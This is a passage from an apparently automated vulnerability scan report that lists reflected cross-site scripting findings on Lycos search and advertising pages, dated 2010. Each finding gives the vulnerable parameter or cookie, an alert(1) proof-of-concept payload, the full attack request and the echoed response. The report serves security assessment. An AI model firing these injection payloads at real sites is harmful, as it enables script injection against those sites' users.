X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?acc05"><script>alert(1)</script>f6d897429=1&mobile=1">
...[SNIP]...

1.136. http://search.lycos.com/image/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf1c"><script>alert(1)</script>be82f60f06e was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multiaaf1c"><script>alert(1)</script>be82f60f06e&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiaaf1c"><script>alert(1)</script>be82f60f06e&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.137. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50828"%3balert(1)//3e5bc5531b2 was submitted in the cat parameter. This input was echoed as 50828";alert(1)//3e5bc5531b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/?tab=multi&cat=video50828"%3balert(1)//3e5bc5531b2 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_video50828";alert(1)//3e5bc5531b2";
//-->
...[SNIP]...

1.138. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de7a"><script>alert(1)</script>0aa4e76c954 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multi&cat=video7de7a"><script>alert(1)</script>0aa4e76c954 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_video7de7a"><script>alert(1)</script>0aa4e76c954&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><script>alert(1)</script>9c23e31d9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?2baf1"><script>alert(1)</script>9c23e31d9b9=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?2baf1"><script>alert(1)</script>9c23e31d9b9=1&mobile=1">
...[SNIP]...

1.140. http://search.lycos.com/video/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae732"><script>alert(1)</script>fc2ad86c0a was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multiae732"><script>alert(1)</script>fc2ad86c0a&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiae732"><script>alert(1)</script>fc2ad86c0a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.141. http://advertising.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f38a"%3balert(1)//20a4f660a78 was submitted in the diktfc cookie. This input was echoed as 2f38a";alert(1)//20a4f660a78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a"%3balert(1)//20a4f660a78; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a";alert(1)//20a4f660a78.lycos.com"
});
</script>
...[SNIP]...

1.142. http://advertising.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7045"><script>alert(1)</script>e23721f874e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8531"%3balert(1)//6adf9a53388 was submitted in the diktfc cookie. This input was echoed as d8531";alert(1)//6adf9a53388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531"%3balert(1)//6adf9a53388; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531";alert(1)//6adf9a53388.lycos.com"
});
</script>
...[SNIP]...

1.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ebb"><script>alert(1)</script>473ae392abf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.145. http://advertising.lycos.com/contactus.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719d"><script>alert(1)</script>1c833ec0851 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.146. http://advertising.lycos.com/contactus.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b5d"%3balert(1)//fbdd08a21ac was submitted in the diktfc cookie. This input was echoed as 73b5d";alert(1)//fbdd08a21ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d"%3balert(1)//fbdd08a21ac; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d";alert(1)//fbdd08a21ac.lycos.com"
});
</script>
...[SNIP]...

1.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad8cc"%3balert(1)//75d1be7661c was submitted in the diktfc cookie. This input was echoed as ad8cc";alert(1)//75d1be7661c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc"%3balert(1)//75d1be7661c; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
